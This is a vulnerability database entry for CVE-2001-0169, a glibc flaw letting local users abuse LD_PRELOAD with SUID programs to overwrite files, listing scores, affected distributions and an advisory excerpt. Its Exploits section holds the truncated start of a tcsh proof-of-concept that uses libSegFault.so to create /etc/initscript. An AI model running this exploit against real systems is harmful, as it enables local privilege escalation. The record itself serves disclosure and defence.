CVE-2001-0169

Published: 26/03/2001 | Updated: 10/10/2017
CVSS v2 Base Score: 2.1 | Impact Score: 2.9 | Exploitability Score: 3.9
VMScore: 215
Vector: AV:L/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

When using the LD_PRELOAD environment variable in SUID or SGID applications, glibc does not verify that preloaded libraries in /etc/ld.so.cache are also SUID/SGID, which could allow a local user to overwrite arbitrary files by loading a library from /lib or /usr/lib.

Vulnerable Product

mandrakesoft mandrake linux corporate server 1.0.1

redhat linux 6.0

redhat linux 6.2

mandrakesoft mandrake linux 6.1

mandrakesoft mandrake linux 7.0

redhat linux 6.1

turbolinux turbolinux

mandrakesoft mandrake linux 7.1

mandrakesoft mandrake linux 7.2

mandrakesoft mandrake linux 6.0

trustix secure linux 1.1

trustix secure linux 1.2

turbolinux turbolinux 6.1

Vendor Advisories

The version of GNU libc that was distributed with Debian GNU/Linux 2.2 suffered from 2 security problems: It was possible to use LD_PRELOAD to load libraries that are listed in /etc/ld.so.cache, even for suid programs. This could be used to create (and overwrite) files which a user should not be allowed to. By using LD_PROFILE suid programs would ...

Exploits

#!/bin/tcsh
# example of exploiting the hole in LD_PRELOAD
# shadow (tested on redhat 6.0, should work on others)
if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje
cd /lib
umask 0
setenv LD_PRELOAD libSegFault.so
setenv SEGFAULT_OUTPUT_NAME /etc/initscript
echo czekaj to moze chwile potrwac
while (! -e /etc/initscript )
( userhe ...